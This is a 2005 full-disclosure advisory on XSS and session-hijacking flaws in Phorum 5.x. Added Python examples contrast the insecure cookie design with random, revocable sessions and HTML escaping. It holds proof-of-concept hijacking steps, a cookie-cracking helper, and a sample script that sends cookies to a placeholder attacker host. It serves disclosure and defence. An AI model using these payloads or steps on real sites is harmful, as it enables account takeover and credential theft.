=======================================================================================
XOR Crew :: Security Advisory 9/1/2005
=======================================================================================
Phorum 5.x Multiple XSS and Session Hijacking Vulnerabilities
=======================================================================================
http://www.xorcrew.net/
=======================================================================================

:: Summary

Vendor       : Phorum.org
Vendor Site  : http://www.phorum.org
Product(s)   : Phorum
Version(s)   : 5.x
Severity     : Low/Medium
Impact       : Exposure of user credentials, session/account hijacking.
Release Date : 8/27/2005
Credits      : wr0ck (wr0ck (a) xorcrew (.) net),
             : 0xception (oxception (a) xorcrew (.) net).

=======================================================================================

I. Description

Phorum is a web-based message board written in PHP. Phorum is designed with high availability and visitor ease of use in mind. Features such as mailing list integration, easy customization and simple installation make Phorum a powerful add-in to any website.

=======================================================================================

II. Synopsis

Phorum <= 5.0.17a has multiple vulnerabilities ranging from XSS to session hijacking and (subjectively) insecure creation of client cookies.

The first of two XSS conditions lies within the user registration form in register.php. Input to the 'Username:' field is not sanitized before the user is added to the database, nor is it encoded when it is later displayed to other users. See III. for details.

A less critical cross-site scripting issue is due to control.php not securely handling a logged-in user's signature when that user is in 'My Control Center' viewing his own profile. This allows HTML/<script> code to be injected into the profile page. Example provided in section III.

There were also 3 vulnerabilities discovered in the way that Phorum deals with client cookies and session management.
One of these is simply how Phorum assigns users cookies: instead of using a random session ID, it creates a cookie whose contents look similar to the following:

    testuser%3A59de1412ec33fd96ac4a4bfc793f1133

This string can be broken up into 3 parts: the username, a URL-encoded ":" (%3A), and the MD5 hash of the password ("testpasswd"):

    testuser | %3A | 59de1412ec33fd96ac4a4bfc793f1133

This means that the contents of a user's session cookie alone are enough to break into that person's Phorum account, and cracking the obtained hash additionally yields the plaintext password. Because a user is authenticated to the application by means of a static cookie instead of a random session identifier, it is possible to hijack a user's session by editing your own cookie to match that of another user, provided that you have the contents of that user's cookie (cookie poisoning). See below for examples.

=======================================================================================

III. Code/PoC

XSS(1):

Navigate to register.php in the Phorum installation directory on 'your' server. Enter HTML/<script> code in the 'Username' field of the registration form; the email and password you enter don't matter. Then, if you haven't already, register/log in as a second user and browse to 'My Control Center', then 'Send A Private Message'. This will take you to a page that contains a drop-down box with the usernames of all registered users, including the malicious username you created earlier. When the list is processed, the usernames are not checked for bad characters, and the "username" you submitted for registration is executed.

XSS(2):

Log in as any user, navigate to 'My Control Center', then 'Edit Signature'. Insert HTML/<script> code in the provided input box and 'Submit' it to save. Then browse to 'View Profile'. The code entered as your signature is executed.

Hijacking(1):

Log in as any user to create your own session cookie.
Obtain/steal the 'phorum_admin_session' cookie contents from a user with administrative privileges. Go to the admin.php page in the main directory of your Phorum installation. Modify your own cookie by executing something similar to the following within your browser:

    javascript:document.cookie="phorum_admin_session=<admin cookie>";

Refresh. :>

Hijacking(2):

Log in as any user and navigate to 'My Control Center' (this will bring you to control.php). Clear the cookie that was created upon your login and enter a URL similar to the following (re-crafted with your own relevant information):

    http://<url>/phorum5/control.php?phorum_session_v5=<cookieInfr0z>

If done correctly, you'll then be logged in as the user whose cookie information was supplied.

NOTE: We realize that session hijacking issues are not Phorum-specific, and generally apply to all web applications that handle user sessions in a way such as this. However, for the sake of completeness, this information has been included in the advisory, more for educational purposes and as an example of the potential impact of the outlined XSS problem(s).

Mr. Moon (the Phorum developer contacted) was kind enough to say:

    "I will be sending you another email when we have these problems fixed."

...no email was received.

Additionally, he down-played the session hijacking entirely, stating:

    "We have researched and investigated ways to remember users across sessions that do not require them to log in again each time they come to the site. We have found no way to do that without some cookie (whether it is the current one or not does not matter) that if known by another user would allow that other user to hijack the account."

While this is partially true, methinks your dev team needs to put a little more effort into their "research". Surely using the user's hashed PASSWORD as a form of unexpirable session ID couldn't have been too smart.
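To make the difference concrete, here is an added illustration. It is not Phorum's code and was not part of the original advisory: it reconstructs the cookie format described in section II (username, "%3A", MD5 of the password) next to a random, expiring, revocable server-side session store of the kind this advisory argues for. The function and class names (make_legacy_cookie, parse_legacy_cookie, crack_legacy_cookie, SessionStore), the sample account alice/letmein and the wordlist are this example's own; the advisory's sample cookie is only parsed, and no claim is made about which password its hash corresponds to.

```python
# Added example for this advisory: NOT Phorum's code. It reconstructs the
# cookie format described above next to a random, revocable session store.
# Names (make_legacy_cookie, SessionStore, ...) and sample data are assumed.
import hashlib
import secrets
import time
from typing import Callable, Dict, Iterable, Optional, Tuple
from urllib.parse import quote, unquote


def make_legacy_cookie(username: str, password: str) -> str:
    """Cookie in the advisory's shape: 'username%3A<md5(password) hex>'.
    It is a function of the credentials alone, so it is identical on every
    login and stays valid until the password changes."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    return quote(f"{username}:{digest}", safe="")


def parse_legacy_cookie(cookie: str) -> Tuple[str, str]:
    """Split a captured legacy cookie into (username, md5_hex)."""
    username, sep, digest = unquote(cookie).partition(":")
    if not sep or len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a username:md5 cookie")
    return username, digest


def crack_legacy_cookie(cookie: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on the hash the cookie carries. The cookie
    alone already logs the attacker in; cracking adds the plaintext password."""
    _, digest = parse_legacy_cookie(cookie)
    for candidate in wordlist:
        if hashlib.md5(candidate.encode("utf-8")).hexdigest() == digest:
            return candidate
    return None


class SessionStore:
    """Opaque random token -> (username, expiry), kept server-side.
    A stolen token still hijacks that one session, but it reveals no
    credential, it expires, and it can be revoked."""

    def __init__(self, ttl_seconds: int = 3600,
                 clock: Callable[[], float] = time.time) -> None:
        self._sessions: Dict[str, Tuple[str, float]] = {}
        self._ttl = ttl_seconds
        self._clock = clock

    def login(self, username: str) -> str:
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._sessions[token] = (username, self._clock() + self._ttl)
        return token

    def user_for(self, token: str) -> Optional[str]:
        """Resolve a presented token; expired tokens are dropped on sight."""
        record = self._sessions.get(token)
        if record is None:
            return None
        username, expires_at = record
        if self._clock() >= expires_at:
            del self._sessions[token]
            return None
        return username

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)

    def revoke_user(self, username: str) -> int:
        """Password change or 'log me out everywhere': kill every token for
        the user. The legacy cookie has no equivalent short of changing the
        password itself."""
        doomed = [t for t, (u, _) in self._sessions.items() if u == username]
        for t in doomed:
            del self._sessions[t]
        return len(doomed)


if __name__ == "__main__":
    # Constructed sample account; the advisory's own sample cookie is only parsed.
    stolen = make_legacy_cookie("alice", "letmein")
    print("legacy cookie :", stolen)
    print("parsed        :", parse_legacy_cookie("testuser%3A59de1412ec33fd96ac4a4bfc793f1133"))
    print("cracked pw    :", crack_legacy_cookie(stolen, ["password", "123456", "letmein"]))

    store = SessionStore(ttl_seconds=60)
    tok = store.login("alice")
    print("random token  :", tok, "->", store.user_for(tok))
    store.revoke_user("alice")
    print("after revoke  :", store.user_for(tok))
```

The two designs differ exactly where the developer's reply says they do not: a stolen random token still hijacks one session, but it expires, can be revoked on logout or password change, and carries nothing about the password; the legacy cookie is the same bytes on every login until the password changes, and hands whoever captures it a hash to crack offline.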
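The two XSS issues in section III come down to the same two missing controls, and the following added illustration (again not Phorum's code and not from the original advisory) shows both: a registration-time allow-list for usernames, which register.php lacks, and HTML encoding when the username (recipient drop-down) or signature (profile page) is rendered. The sample accounts, the markup, and the helper names (valid_username, render_recipient_select, render_signature) are assumed for the example and are not taken from Phorum's templates.

```python
# Added example for this advisory: NOT Phorum's code. It shows the two
# missing controls behind XSS(1) and XSS(2): no allow-list on the username
# at registration, and no HTML encoding when the username (recipient list)
# or signature (profile page) is rendered. Names and markup are assumed.
import html
import re
from typing import Iterable

# Constructed sample accounts. The third is the kind of "username" XSS(1)
# registers: it closes the <option> and <select> and starts a script.
USERS = [
    "alice",
    "bob",
    '</option></select><script>alert(document.cookie)</script>',
]

# Allow-list for usernames: letters, digits, '_', '.', '-', 3..32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def valid_username(name: str) -> bool:
    """Registration-time check register.php lacks: accept a known-good
    alphabet instead of trying to strip 'bad' characters."""
    return USERNAME_RE.fullmatch(name) is not None


def render_recipient_select_unsafe(usernames: Iterable[str]) -> str:
    """The recipient drop-down as the advisory describes it: usernames
    interpolated into the markup exactly as stored."""
    options = "".join(f'<option value="{u}">{u}</option>' for u in usernames)
    return f'<select name="to">{options}</select>'


def render_recipient_select(usernames: Iterable[str]) -> str:
    """Hardened rendering: encode for each context the value lands in.
    quote=True also encodes ' and " so the attribute cannot be broken out of."""
    options = "".join(
        f'<option value="{html.escape(u, quote=True)}">{html.escape(u)}</option>'
        for u in usernames
    )
    return f'<select name="to">{options}</select>'


def render_signature_unsafe(signature: str) -> str:
    """XSS(2): the signature dropped into the profile page as-is."""
    return f'<div class="signature">{signature}</div>'


def render_signature(signature: str) -> str:
    """Same fix for the signature. If formatting is wanted, translate a
    restricted markup to HTML after escaping; never accept raw HTML."""
    return f'<div class="signature">{html.escape(signature, quote=True)}</div>'


def has_live_script(markup: str) -> bool:
    """Demo check: does an un-encoded <script tag survive in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for u in USERS:
        print(f"{u!r:70} valid={valid_username(u)}")
    print("unsafe :", render_recipient_select_unsafe(USERS))
    print("escaped:", render_recipient_select(USERS))
    # Constructed cookie-stealing signature; attacker.invalid is a placeholder host.
    sig = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
    print("sig unsafe:", render_signature_unsafe(sig))
    print("sig safe  :", render_signature(sig))
```

The allow-list alone is not enough (signatures legitimately contain more than [A-Za-z0-9_.-]) and the encoding alone is not enough (an unvalidated username will reach every other template that prints it), which is why both are shown; in the unsafe output the malicious account's markup closes the select element and its script tag survives, while the encoded output keeps all three accounts as plain option text.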
Also, before I had the chance to reply to his ignorant email and offer polite suggestions as to how he could more securely manage his users' sessions, he updated Phorum.org to read:

    "...We have talked at length about how we create our session cookies. It's true that if someone can get your cookie, they can log in as you. But, that is gonna be true for any application/web site on the internet."

Brian, buddy, first of all that's not true... at all. Secondly, I hardly consider my initial notice followed by your response an in-depth conversation. Either way, w3 l0v3 y0u 4nd y0ur BIG m0u7h :)

=======================================================================================

IV. Fix

Upgrade to Phorum v5.0.18... or Invision Power Board.

=======================================================================================

V. Greets :>

All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.

=======================================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/